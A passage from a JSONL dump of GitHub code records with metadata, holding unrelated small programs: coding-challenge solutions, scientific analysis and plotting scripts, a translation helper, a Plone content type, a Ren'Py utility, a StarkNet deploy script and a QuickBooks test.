\"mississippi\"\np = \"mis*is*p*.\"\nOutput: false\n\n'''\n\nclass Solution:\n def isMatch(s: str, p: str) -> bool:\n ans = False\n indexS, indexP = 0, 0\n curP = ''\n\n # understand the patterns\n patternList = []\n while indexP < len(p):\n if p[indexP] == '*':\n curP += p[indexP]\n patternList.append(curP)\n curP = ''\n\n else:\n if curP != '':\n patternList.append(curP)\n curP = p[indexP]\n\n indexP += 1\n if curP != '':\n patternList.append(curP)\n print('patternList:', patternList)\n\n # compare with the patterns\n indexP = 0\n flagStar = False\n strStar = ''\n while indexS < len(s) and indexP < len(p):\n curP = patternList[indexP]\n if flagStar == True:\n if curP == '.*':\n if s[indexS] == strStar:\n indexS += 1\n continue\n else:\n flagStar = False\n indexS += 1\n indexP += 1\n continue\n else: #curP == 'm*' like that\n if s[indexS] == strStar:\n indexS += 1\n continue\n else:\n flagStar = False\n indexS += 1\n indexP += 1\n continue\n else:\n if curP == '.':\n indexP += 1\n indexS += 1\n elif curP == '.*':\n flagStar = True\n strStar = s[indexS]\n indexS += 1\n continue\n elif '*' in curP:\n flagStar = True\n strStar = s[indexS]\n indexS += 1\n continue\n # the normal characters\n else:\n if p[indexP] == s[indexS]:\n indexP += 1\n indexS += 1\n else:\n return False\n if indexS < len(s) or indexP < len(p):\n return False\n return True\n \n\n\ns = \"misf\"\np = \"mis.*\"\nres = Solution.isMatch(s,p)\nprint(res)\n","repo_name":"weichen-liao/Leetcode","sub_path":"hard_10.py","file_name":"hard_10.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4362608665","text":"#!/usr/bin/python3\nfrom sys import argv\nif __name__ == \"__main__\":\n sum = 0\n b = 1\n a = len(argv) - 1\n while (a > 0):\n d = int(argv[b])\n sum += d\n b += 1\n a -= 1\n\n print(\"{:d}\".format(sum))\n","repo_name":"FisaniG/alx-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29292304624","text":"import copy\n\ndef solution(emergency):\n #return sorted(range(len(emergency)), key=lambda k: emergency[k], reverse=True)\n copy_e = copy.deepcopy(emergency)\n copy_e = sorted(copy_e, reverse=True)\n print(emergency, copy_e)\n for i in range(1, len(emergency)+1):\n emergency[i-1] = copy_e.index(emergency[i-1])+1\n \n return emergency","repo_name":"privacy97/Programmers_Python","sub_path":"프로그래머스/lv0/120835. 진료 순서 정하기/진료 순서 정하기.py","file_name":"진료 순서 정하기.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17875503557","text":"import numpy as np\nimport scipy.signal\n\nfrom sanpy.user_analysis.baseUserAnalysis import baseUserAnalysis\n\nfrom sanpy.sanpyLogger import get_logger\nlogger = get_logger(__name__)\n\nclass kymUserAnalysis(baseUserAnalysis):\n \"\"\"Create and perform kymograph diameter analysis and add it to the main bAnalysis.\n \n This is called from two place:\n 1) after main bAnalysis detect spikes\n 2) after user analyzes diameter in the Kymograph plugin\n \"\"\"\n def defineUserStats(self):\n \"\"\"Add your user stats here.\"\"\"\n # if self.ba is None or not self.ba.fileLoader.isKymograph:\n # return\n \n # foot\n self.addUserStat(\"Diameter Foot (um)\", \"k_diam_foot\")\n self.addUserStat(\"Diameter Foot Pnt\", \"k_diam_foot_pnt\")\n self.addUserStat(\"Diameter Foot Time (s)\", \"k_diam_foot_sec\")\n # peak\n self.addUserStat(\"Diameter Peak (um)\", \"k_diam_peak\")\n self.addUserStat(\"Diameter Peak Pnt\", \"k_diam_peak_pnt\")\n self.addUserStat(\"Diameter Peak Time (s)\", \"k_diam_peak_sec\")\n # summary\n\n # do both time to peak with in\n self.addUserStat(\"Diameter Time To Peak wrt peak in the Ca sppike(s)\", \"k_diam_time_to_peak_sec\")\n\n self.addUserStat(\"Diameter Amp (um)\", \"k_diam_amp\")\n self.addUserStat(\"Diameter Percent Change (%)\", \"k_diam_percent\")\n\n def run(self):\n if not self.ba.fileLoader.isKymograph:\n return\n if self.ba.kymAnalysis is None:\n return\n if not self.ba.kymAnalysis.hasDiamAnalysis:\n return\n\n logger.info('RUNNING userKyDiamAnalysis')\n \n # get filtered vm for the entire trace\n # filteredVm = self.getFilteredVm()\n\n diameter_um = self.ba.kymAnalysis.getResults('diameter_um')\n diameter_um = np.array(diameter_um)\n\n diameter_um = scipy.signal.medfilt(diameter_um, 3)\n \n lastIdx = self.ba.numSpikes - 1\n\n for spikeIdx, spikeDict in enumerate(self.ba.spikeDict):\n k_diam_foot = float('nan')\n k_diam_foot_pnt = float('nan')\n k_diam_foot_sec = float('nan')\n\n k_diam_peak = float('nan')\n k_diam_peak_pnt = float('nan')\n k_diam_peak_sec = float('nan')\n\n k_diam_time_to_peak_sec = float('nan')\n k_diam_amp = float('nan')\n\n if spikeIdx != lastIdx:\n \n nextThresholdPnt = self.ba.spikeDict[spikeIdx+1]['thresholdPnt']\n thresholdPnt = spikeDict['thresholdPnt']\n \n # baseline of diam before Ca spike\n footStartPnt = thresholdPnt - 12\n if footStartPnt < 0:\n continue\n footStopPnt = thresholdPnt - 2\n footMean = np.mean(diameter_um[footStartPnt:footStopPnt])\n\n k_diam_foot = footMean\n k_diam_foot_pnt = thresholdPnt - 6\n k_diam_foot_sec = self.ba.fileLoader.pnt2Sec_(k_diam_foot_pnt)\n\n # peak of diam before next Ca spike\n diamClip = diameter_um[thresholdPnt:nextThresholdPnt]\n \n k_diam_peak = np.min(diamClip)\n k_diam_amp = k_diam_peak - k_diam_foot\n\n _maxPnt = np.argmin(diamClip)\n k_diam_peak_pnt = _maxPnt + thresholdPnt\n k_diam_peak_sec = self.ba.fileLoader.pnt2Sec_(k_diam_peak_pnt)\n\n k_diam_time_to_peak_sec = k_diam_peak_sec - self.ba.fileLoader.pnt2Sec_(thresholdPnt)\n\n # logger.info(f' {spikeIdx} {k_diam_foot} {k_diam_foot_pnt}')\n\n # assign to underlying bAnalysis\n \n # foot\n logger.info(f'spikeIdx:{spikeIdx} k_diam_foot:{k_diam_foot}')\n self.setSpikeValue(spikeIdx, \"k_diam_foot\", k_diam_foot)\n self.setSpikeValue(spikeIdx, \"k_diam_foot_pnt\", k_diam_foot_pnt)\n self.setSpikeValue(spikeIdx, \"k_diam_foot_sec\", k_diam_foot_sec)\n # peak\n self.setSpikeValue(spikeIdx, \"k_diam_peak\", k_diam_peak)\n self.setSpikeValue(spikeIdx, \"k_diam_peak_pnt\", k_diam_peak_pnt)\n self.setSpikeValue(spikeIdx, \"k_diam_peak_sec\", k_diam_peak_sec)\n # summary\n self.setSpikeValue(spikeIdx, \"k_diam_time_to_peak_sec\", k_diam_time_to_peak_sec)\n self.setSpikeValue(spikeIdx, \"k_diam_amp\", k_diam_amp)\n\n # percent change in diameter from foot to peak\n k_diam_percent = round( k_diam_peak / k_diam_foot * 100, 3)\n self.setSpikeValue(spikeIdx, \"k_diam_percent\", k_diam_percent)\n","repo_name":"cudmore/SanPy","sub_path":"sanpy/user_analysis/userKymDiamAnalysis.py","file_name":"userKymDiamAnalysis.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"12785767843","text":"''' This program gets as input a file with strings to create and converts them\n to the correct format.\n For example, if input is:\n \"Please Allow Permission\"\n Location permission needed to use Bluetooth!\n\n The output will be:\n \n Please Allow Permission\n Location permission needed to use Bluetooth!\n \n The program will also go over all java files and replace the string with 'getApplicationContext().getString(R.string.%s)'\n'''\n\nimport sys\nimport os\n\ndef AddImport(file_name):\n import_str = \"import static com.eveningoutpost.dexdrip.xdrip.gs;\\n\"\n with open(file_name) as f:\n lines = f.readlines()\n \n # The code below assumes that imports have already been sorted.\n replaced = False\n with open(file_name, \"w\") as f:\n for line in lines:\n if import_str == line:\n continue;\n if import_str > line or line.startswith(\"package\") or replaced:\n f.write(line)\n continue\n \n f.write(import_str)\n replaced = True\n f.write(line)\n \n \n\ndef ReplaceString(file_name, id, string):\n content = open(file_name).read()\n full_string = '\"%s\"' %string\n new_string = 'gs(R.string.%s)' % id\n print('replacing ', full_string, new_string)\n if full_string in content:\n print('yeeeeeeeee')\n content = content.replace(full_string, new_string)\n file = open(file_name , \"w\")\n file.write(content)\n file.close()\n\ndef FileContainsString(file, string):\n #print(file)\n full_string = '\"%s\"' %string\n if full_string in open(file).read():\n return True\n return False\n\ndef FindFileContaingString(id, string):\n arr = []\n for d,r,f in os.walk(\"..\\\\..\\\\\"):\n for file in f:\n if file.endswith(\"java\") and \"generated\" not in file and not \"PebbleDisplay\" in file :\n arr.append(os.path.join(d,file))\n \n for file in arr:\n if file.startswith(\"..\\\\..\\\\wear\"):\n continue\n if not FileContainsString(file, string): \n continue\n print(file)\n ReplaceString(file, id, string)\n AddImport(file)\n\n\ndef ReadFile(file_name):\n with open(file_name) as f:\n content = f.readlines()\n # you may also want to remove whitespace characters like `\\n` at the end of each line\n content = [x.strip() for x in content] \n for line in content:\n if line.strip() == '':\n continue\n if line.startswith(\"#\"):\n continue \n if line.startswith('\"') and line.endswith('\"'):\n line = line[1:-1]\n \n header = line.lower().replace(' ','_')\n header = header.replace('\\\\n','_')\n header = header.replace('!','')\n header = header.replace(',','')\n header = header.replace(':','')\n header = header.replace('?','')\n header = header.replace('.','')\n header = header.replace('+','')\n header = header.replace('-','')\n header = header.replace('(','')\n header = header.replace(')','')\n header = header.replace(\"'\",'')\n \n print (' ', line,'', sep='')\n \n FindFileContaingString(header, line)\n \n \nReadFile(sys.argv[1])","repo_name":"NightscoutFoundation/xDrip","sub_path":"etc/FixLangs/CreateTranslations.py","file_name":"CreateTranslations.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","stars":1208,"dataset":"github-code","pt":"60"} +{"seq_id":"72472765950","text":"import numpy as np \nimport scipy.integrate as spint \nfrom gen_var import dr,pel_pot, rp, rc, t_start, r\nimport scipy.interpolate as spit\nimport os \nimport romberg as ro \n\ndef renorm(r_raw, bins_raw):\n frac_left = np.sum(bins_raw)\n #Interpolation Information\n rpi = rp[t_start]\n rci = rc[t_start]\n f = spit.interp1d(np.flip(r_raw,axis = 0), np.flip(bins_raw, axis = 0), \n fill_value = 'extrapolate', kind = 'quadratic')\n g = spit.PchipInterpolator(np.flip(r_raw, axis = 0), np.flip(bins_raw, axis = 0), extrapolate = 'true')\n low_int = next(p[0] for p in enumerate(r) if p[1] > r_raw[-1]) - 1\n up_int = next(p[0] for p in enumerate(r) if p[1] > r_raw[0])\n\n low = next(p[0] for p in enumerate(r) if p[1] > rpi)\n up = next(p[0] for p in enumerate(r) if p[1] > rci)\n\n r1 = r[low_int]\n r2 = r[up_int]\n r_int = np.linspace(rpi,rci, num = 1 + 2**10, endpoint = 'True')\n n_romb = len(r)\n bins_full = f(r_int)\n integrated = spint.romb(bins_full, dx = -r_int[0] + r_int[1])\n dens_full = bins_full[:]/integrated\n return bins_full, dens_full, r_int","repo_name":"fkmart/Pellet-Ablation","sub_path":"FUNC_renorm_dens.py","file_name":"FUNC_renorm_dens.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1225164830","text":"import typing\r\n\r\n\r\ndef main() -> typing.NoReturn:\r\n n = int(input())\r\n\r\n # n = h * w + r\r\n # minimize |h - w| + r\r\n\r\n # inf = 1 << 60\r\n mn = n # h = 0\r\n for h in range(1, n + 1):\r\n if h * h > n:\r\n break\r\n w = n // h\r\n\r\n mn = min(mn, w - h + n - w * h)\r\n print(mn)\r\n\r\n\r\nmain()\r\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/abc040/abc040_b/28229207.py","file_name":"28229207.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"30102231344","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nfrom itertools import product\nimport numpy as np\nimport xarray as xr\nfrom matplotlib import pyplot as plt\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nfrom scipy.ndimage import median_filter\nimport seaborn as sns\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nfrom scipy import signal\n\ndef gaussKern(size):\n \"\"\"\n Calculate a normalised Gaussian kernel to apply as a smoothing\n function.\n\n :param int size: the size of the kernel to use (how many points will be\n used in the smoothing operation).\n :returns: :class:`numpy.ndarray` normalised 2D kernel array for use in\n convolutions\n \"\"\"\n size = int(size)\n x, y = np.mgrid[-size:size + 1, -size:size + 1]\n g = np.exp(-(x**2/float(size) + y**2/float(size)))\n return g / g.sum()\n\ndef smooth(im, n=15):\n \"\"\"\n Smooth a 2D array `im` by convolving with a Gaussian kernel of size `n`.\n\n :param im: Array of values to be smoothed\n :type im: :class:`numpy.ndarray`\n :param int n: Number of points to include in the smoothing.\n\n :returns: smoothed array (same dimensions as the input array)\n\n \"\"\"\n g = gaussKern(n)\n improc = signal.convolve2d(im, g, mode='same', boundary='symm')\n return improc\n\ndef subset(ds, extent):\n\n data = ds.sel(\n lat=slice(extent[3], extent[2]),\n lon=slice(extent[0], extent[1])\n )\n return data\n\ndatapath = '/scratch/w85/swhaq/hazard/output/QLD'\ndatapath = '/g/data/w85/QFES_SWHA/hazard/output/'\ngroups = ['GROUP1', 'GROUP2']\nrcps = ['RCP45', 'RCP85']\nperiods = ['2021-2040', '2041-2060', '2061-2080', '2081-2100']\n\nextent = (150, 155, -30, -24)\nbbox = dict(boxstyle=\"round\", fc=\"white\", alpha=0.5)\n\ng = 'GROUP1'\nrlabel = {'RCP45': 'RCP 4.5', 'RCP85': 'RCP 8.5'}\np = '2081-2100'\naris = [50, 100, 500, 2000]\nfigsize=(12, 10)\nprj = ccrs.PlateCarree()\nborders = cfeature.NaturalEarthFeature(\n category='cultural',\n name='admin_1_states_provinces_lines',\n scale='10m',\n facecolor='none')\n\npalette = [(1, 1, 1),\n (0.000, 0.627, 0.235),\n (0.412, 0.627, 0.235),\n (0.663, 0.780, 0.282),\n (0.957, 0.812, 0.000),\n (0.925, 0.643, 0.016),\n (0.835, 0.314, 0.118),\n (0.780, 0.086, 0.118)]\ncmap = sns.blend_palette(palette, as_cmap=True)\nlevels = np.arange(30, 101., 5.)\nlevelskmh = np.arange(50, 351, 25.)\n\nfor g in groups:\n for r in rcps:\n for p in periods:\n scenario = f'{g}_{r}_{p}'\n fname = os.path.join(datapath, scenario, 'hazard', 'hazard_rel_hist.nc')\n print(f\"Processing {fname}\")\n ds = xr.open_dataset(fname)\n lats = ds.lat.sel(lat=slice(extent[3], extent[2])).values\n lons = ds.lon.sel(lon=slice(extent[0], extent[1])).values\n lat, lon = np.meshgrid(lats, lons)\n dx = np.mean(np.diff(ds.lon.values))\n\n for ari in aris:\n fig, ax = plt.subplots(1, 1, subplot_kw={'projection':prj})\n title = f\"1:{ari} AEP wind speed - {p}\"\n data = subset(ds.wspd.sel({'ari': ari}), extent)\n sdata = smooth(data, int(1/dx))\n cs = ax.contourf(lon, lat, sdata.T, levels=levels, extend='both', cmap=cmap)\n plt.colorbar(cs, extend='both', label=\"AEP wind speed [m/s]\", ax=ax)\n ax.set_extent(extent)\n ax.coastlines(resolution='10m')\n ax.add_feature(borders, edgecolor='k', linewidth=0.5)\n gl = ax.gridlines(draw_labels=True, linestyle='--')\n gl.top_labels = False\n gl.right_labels = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlabel_style = {'size': 'x-small'}\n gl.ylabel_style = {'size': 'x-small'}\n ax.set_title(title)\n plt.tight_layout()\n outputfile = os.path.join(datapath, scenario, 'plots', f'hazard.{ari}.mps.png')\n plt.savefig(outputfile, bbox_inches='tight')\n plt.close(fig)\n\nfor p in periods:\n for ari in aris:\n fig, axes = plt.subplots(2, 2, figsize=(10, 10),\n subplot_kw={'projection':prj},\n sharex=True, sharey=True)\n ax = axes.flatten()\n for i, (g, r) in enumerate(product(groups, rcps)):\n print(f\"Plotting hazard for {g} - {r} - {p} - {ari}\")\n suptitle = f\"1:{ari} AEP wind speed - {p}\"\n scenario = f\"{g}_{r}_{p}\"\n fname = os.path.join(datapath, scenario, 'hazard', 'hazard_rel_hist.nc')\n ds = xr.open_dataset(fname)\n data = subset(ds.wspd.sel({'ari': ari}), extent)\n lats = ds.lat.sel(lat=slice(extent[3], extent[2])).values\n lons = ds.lon.sel(lon=slice(extent[0], extent[1])).values\n lat, lon = np.meshgrid(lats, lons)\n sdata = smooth(data, int(1/dx))\n cs = ax[i].contourf(lon, lat, 3.6*sdata.T, levels=levelskmh, extend='both', cmap=cmap)\n title = f\"{g} {rlabel[r]}\"\n ax[i].set_extent(extent)\n ax[i].coastlines(resolution='10m')\n ax[i].add_feature(borders, edgecolor='k', linewidth=0.5)\n gl = ax[i].gridlines(draw_labels=True, linestyle='--')\n gl.top_labels = False\n gl.right_labels = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlabel_style = {'size': 'x-small'}\n gl.ylabel_style = {'size': 'x-small'}\n ax[i].text(0.5, 0.95, title, ha='center', va='center', fontsize='small',transform=ax[i].transAxes, bbox=bbox)\n fig.subplots_adjust(right=0.875, wspace=0.1, hspace=0.05, top=0.95)\n cbar_ax = fig.add_axes([0.9, 0.15, 0.025, 0.7])\n cbarlabel = \"AEP wind speed [km/h]\"\n fig.colorbar(cs, cax=cbar_ax, label=cbarlabel)\n #plt.tight_layout()\n fig.suptitle(suptitle)\n outputfile = os.path.join(datapath, f'hazard.{ari}.{p}.kmh.png')\n plt.savefig(outputfile, bbox_inches='tight')\n plt.close(fig)\n\n# Plot historic hazard:\nprint(\"Plotting historic data\")\n\nfname = os.path.join(datapath, 'HISTORICAL_1981-2010', 'hazard', 'hazard.nc')\nds = xr.open_dataset(fname)\nlats = ds.lat.sel(lat=slice(extent[3], extent[2])).values\nlons = ds.lon.sel(lon=slice(extent[0], extent[1])).values\nlat, lon = np.meshgrid(lats, lons)\ndx = np.mean(np.diff(ds.lon.values))\n\nfor ari in aris:\n fig, ax = plt.subplots(1, 1, subplot_kw={'projection':prj})\n title = f\"1:{ari} AEP wind speed - 1981-2010\"\n data = subset(ds.wspd.sel({'ari': ari}), extent)\n sdata = smooth(data, int(1/dx))\n cs = ax.contourf(lon, lat, 3.6*sdata.T, levels=levelskmh, extend='both', cmap=cmap)\n plt.colorbar(cs, extend='both', label=\"AEP wind speed [km/h]\", ax=ax)\n ax.set_extent(extent)\n ax.coastlines(resolution='10m')\n ax.add_feature(borders, edgecolor='k', linewidth=0.5)\n gl = ax.gridlines(draw_labels=True, linestyle='--')\n gl.top_labels = False\n gl.right_labels = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlabel_style = {'size': 'x-small'}\n gl.ylabel_style = {'size': 'x-small'}\n ax.set_title(title)\n plt.tight_layout()\n outputfile = os.path.join(datapath, 'HISTORICAL_1981-2010', 'plots', f'hazard.{ari}.kmh.png')\n plt.savefig(outputfile, bbox_inches='tight')\n plt.close(fig)","repo_name":"GeoscienceAustralia/SWHAQ","sub_path":"scripts/plotting/plotHazardMap.py","file_name":"plotHazardMap.py","file_ext":"py","file_size_in_byte":7597,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"29963941133","text":"__author__ = \"\"\"unknown \"\"\"\n__docformat__ = 'plaintext'\n\nfrom AccessControl import ClassSecurityInfo\nfrom Products.Archetypes.atapi import *\nfrom zope import interface\nfrom zope.interface import implements\nimport interfaces\nfrom Products.Communities.interfaces.csiruser import ICSIRUser\nfrom Products.CMFDynamicViewFTI.browserdefault import BrowserDefaultMixin\n\n# imports needed by remember\nfrom Products.remember.content.member import BaseMember\nfrom Products.remember.permissions import \\\n VIEW_PUBLIC_PERMISSION, EDIT_ID_PERMISSION, \\\n EDIT_PROPERTIES_PERMISSION, VIEW_OTHER_PERMISSION, \\\n VIEW_SECURITY_PERMISSION, EDIT_PASSWORD_PERMISSION, \\\n EDIT_SECURITY_PERMISSION, MAIL_PASSWORD_PERMISSION, \\\n ADD_MEMBER_PERMISSION\nfrom AccessControl import ModuleSecurityInfo\nfrom Products.Communities.config import *\n\n# additional imports from tagged value 'import'\nfrom Products.CMFCore.utils import getToolByName\n\n##code-section module-header #fill in your manual code here\n##/code-section module-header\n\nschema = Schema((\n\n StringField(\n name='defaultCommunity',\n widget=SelectionWidget(\n label='Defaultcommunity',\n label_msgid='Communities_label_defaultCommunity',\n i18n_domain='Communities',\n ),\n vocabulary=\"getMyCommunities\",\n searchable=1,\n ),\n\n),\n)\n\n##code-section after-local-schema #fill in your manual code here\n##/code-section after-local-schema\n\nCSIRUser_schema = BaseSchema.copy() + \\\n BaseMember.schema.copy() + \\\n ExtensibleMetadata.schema.copy() + \\\n schema.copy()\n\n##code-section after-schema #fill in your manual code here\n##/code-section after-schema\n\nclass CSIRUser(BaseMember, BrowserDefaultMixin, BaseContent):\n \"\"\"\n \"\"\"\n security = ClassSecurityInfo()\n\n implements(interfaces.ICSIRUser, ICSIRUser)\n\n meta_type = 'CSIRUser'\n _at_rename_after_creation = True\n\n schema = CSIRUser_schema\n\n base_archetype = BaseContent\n\n ##code-section class-header #fill in your manual code here\n ##/code-section class-header\n\n\n # A member's __call__ should not render itself, this causes recursion\n def __call__(self, *args, **kwargs):\n return self.getId()\n \n\n # Methods\n\n security.declarePublic('getMyCommunities')\n def getMyCommunities(self):\n \"\"\"\n \"\"\"\n ctool = getToolByName(self, 'portal_communitytool')\n communities = ctool.getMyCommunities()\n\n result = [('None', '')]\n #community = ctool.getDefaultCommunity()\n #result += [(community.id, community.title_or_id())]\n for community in communities:\n result += [(community.id, community.title_or_id())]\n return result\n\n\nregisterType(CSIRUser, PROJECTNAME)\n# end of class CSIRUser\n\n##code-section module-footer #fill in your manual code here\n##/code-section module-footer\n\n\n\n","repo_name":"BGCX261/zmetadata-svn-to-git","sub_path":"trunk/Communities/content/csiruser.py","file_name":"csiruser.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5145791241","text":"from turtle import Turtle,Screen\nimport random\n\npen = Turtle()\n\ncolors = [\"CornflowerBlue\",\"IndianRed\",\"DeepSkyBlue\",\"DarkOrchid\",\"wheat\",\"SeaGreen\",\"SlateGray\"]\n\ndirections = [0,90,180,270]\n\npen.pensize(10)\npen.speed(\"fastest\")\n\nfor _ in range(200):\n pen.color(random.choice(colors))\n pen.forward(30)\n pen.setheading(random.choice(directions))\n\nscreen=Screen()\nscreen.exitonclick()","repo_name":"Upendra2003/Python-Graphics","sub_path":"Random_Walk/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"879421655","text":"from pythonpackages.renpy_utility.renpy_custom_log import *\n\n__all__ = [\n \"update_flags\",\n \"get_flags\",\n \"set_flags\",\n]\n\n\ndef update_flags(flags: dict[str, bool], flag_keys: list[str]):\n \"\"\"update flags by making it with the same elements of flag_keys. in case you have to add them set them as False\"\"\"\n # check if there are less elements than flag_keys\n # in case you add them set with False\n for x in flag_keys:\n if (not (x in flags)):\n flags[x] = False\n # check if there are more elements than flag_keys\n # in case it eliminates them\n flags_to_del = []\n for x in flags:\n if (not (x in flag_keys)):\n flags_to_del.append(x)\n for x in flags_to_del:\n del flags[x]\n del flags_to_del\n return flags\n\n\ndef get_flags(flag_id: str, flags: dict[str, bool]) -> bool:\n \"\"\"returns the value of the flag_id in flags\"\"\"\n if (flag_id in flags):\n return flags[flag_id]\n else:\n return False\n\n\ndef set_flags(flag_id: str, value: bool, flags: dict[str, bool]):\n flags[flag_id] = value\n return\n","repo_name":"DRincs-Productions/renpy-utility-lib","sub_path":"pythonpackages/renpy_utility/flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71236906110","text":"import sys\nsys.stdin = open(\"구슬 굴리기.txt\")\n\ndef find(r,c):\n global cnt\n x, y = r, c\n # 1번 윗 방향 2번 아랫방향, 3번 왼쪽, 4번 오른쪽\n dr = [0, -1, 1, 0, 0]\n dc = [0, 0, 0, -1, 1]\n i=0\n while i < len(data):\n r = r + dr[data[i]]\n c = c + dc[data[i]]\n if arr[r][c] == '0':\n arr[r][c] = '9'\n cnt += 1\n elif arr[r][c] == '1':\n r = r - dr[data[i]]\n c = c - dc[data[i]]\n i += 1\n\n\n\n\n\n\n\n\nR, C = map(int, input().split())\narr = [['1' for _ in range(C+2)] for _ in range(R+2)]\nfor i in range(1, R+1):\n arr[i] = ['1'] + list((input())) + ['1']\nN = int(input())\ndata = list(map(int, input().split()))\ncnt = 1\nfor i in range(1, R + 2):\n for j in range(1, C + 2):\n if arr[i][j] == '2':\n find(i, j)\n\nprint(cnt)\n# for i in range(R+2):\n# for j in range(C+2):\n# print(arr[i][j], end=\" \")\n# print()","repo_name":"hoyoung2176/TIL","sub_path":"Algorithm/test/IM/D03/구슬굴리기.py","file_name":"구슬굴리기.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73594615839","text":"from collections import namedtuple\nfrom realms_cli.caller_invoker import wrapped_send, declare\nfrom realms_cli.deployer import logged_deploy\nfrom realms_cli.config import Config, strhex_as_strfelt, safe_load_deployment\nfrom realms_cli.utils import str_to_felt\n\nContracts = namedtuple('Contracts', 'alias contract_name id')\n\n# STEPS\n# 0. Set new names in array accordingly to the tuple structure\n# 1. Deploy implementation\n# 2. Deploy proxy\n# 3. Initialise\n\nNEW_MODULES = [\n Contracts(\"Adventurer\", \"Adventurer\", \"14\"),\n]\n\n# Realms\nLOOT = str_to_felt(\"LOOT\")\nLOOT_SYMBOL = str_to_felt(\"LOOT\")\n\nADVENTURER = str_to_felt(\"ADVENTURER\")\nADVENTURER_SYMBOL = str_to_felt(\"ADVENTURER\")\n\n\ndef run(nre):\n\n config = Config(nre.network)\n\n #---------------- SET MODULES ----------------#\n\n for contract in NEW_MODULES:\n\n logged_deploy(\n nre,\n contract.contract_name,\n alias=contract.alias,\n arguments=[],\n )\n\n declare(contract.contract_name, contract.alias)\n\n predeclared_class = nre.get_declaration(contract.alias)\n\n logged_deploy(\n nre,\n 'PROXY_Logic',\n alias='proxy_' + contract.alias,\n arguments=[strhex_as_strfelt(predeclared_class)],\n )\n\n #---------------- INIT MODULES ----------------#\n\n for contract in NEW_MODULES:\n\n wrapped_send(\n network=config.nile_network,\n signer_alias=config.ADMIN_ALIAS,\n contract_alias=\"proxy_\" + contract.contract_name,\n function=\"initializer\",\n arguments=[ADVENTURER, ADVENTURER_SYMBOL, strhex_as_strfelt(\n config.ADMIN_ADDRESS), strhex_as_strfelt(config.XOROSHIRO_ADDRESS), strhex_as_strfelt(config.LOOT_PROXY_ADDRESS), strhex_as_strfelt(config.XOROSHIRO_ADDRESS), strhex_as_strfelt(config.LORDS_PROXY_ADDRESS)],\n )\n","repo_name":"velarxneo/monstersrealms","sub_path":"realms-contracts/realms_cli/loot/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14573678751","text":"import time\nfrom datetime import datetime\n\nfrom quickbooks.objects import Transfer\nfrom quickbooks.objects.account import Account\nfrom quickbooks.objects.creditcardpayment_entity import CreditCardPayment\nfrom tests.integration.test_base import QuickbooksTestCase\n\n\nclass CreditCardPaymentEntityTest(QuickbooksTestCase):\n def setUp(self):\n time.sleep(3) # Used to prevent error code 3001 - The request limit was reached.\n super(CreditCardPaymentEntityTest, self).setUp()\n\n self.account_number = datetime.now().strftime('%d%H%M')\n self.name = \"Test CreditCardPaymentEntityTest {0}\".format(self.account_number)\n\n def test_create(self):\n credit_card_account = Account()\n credit_card_account.Name = \"Credit Card Account {0}\".format(self.account_number)\n credit_card_account.AccountType = \"Credit Card\"\n credit_card_account.AccountSubType = \"CreditCard\"\n credit_card_account.save(qb=self.qb_client)\n\n accounts = Account.where(\n \"Classification = 'Asset' AND FullyQualifiedName != 'Accounts Receivable (A/R)'\",\n max_results=1, qb=self.qb_client)\n\n from_account = accounts[0]\n to_account = credit_card_account\n\n credit_card_payment = CreditCardPayment()\n credit_card_payment.Amount = 100\n credit_card_payment.BankAccountRef = from_account.to_ref()\n credit_card_payment.CreditCardAccountRef = to_account.to_ref()\n\n credit_card_payment.save(qb=self.qb_client)\n\n query_credit_card_payment = CreditCardPayment.get(credit_card_payment.Id, qb=self.qb_client)\n\n self.assertEqual(query_credit_card_payment.Id, credit_card_payment.Id)\n self.assertEqual(query_credit_card_payment.Amount, 100)\n self.assertEqual(query_credit_card_payment.BankAccountRef.value, from_account.Id)\n self.assertEqual(query_credit_card_payment.CreditCardAccountRef.value, to_account.Id)\n\n # reset transfer (so the from_account doesn't run out of cash)\n # I wonder if we can do a transfer from credit_card_account to a bank_account\n transfer = Transfer()\n transfer.Amount = 100\n transfer.FromAccountRef = to_account.to_ref()\n transfer.ToAccountRef = 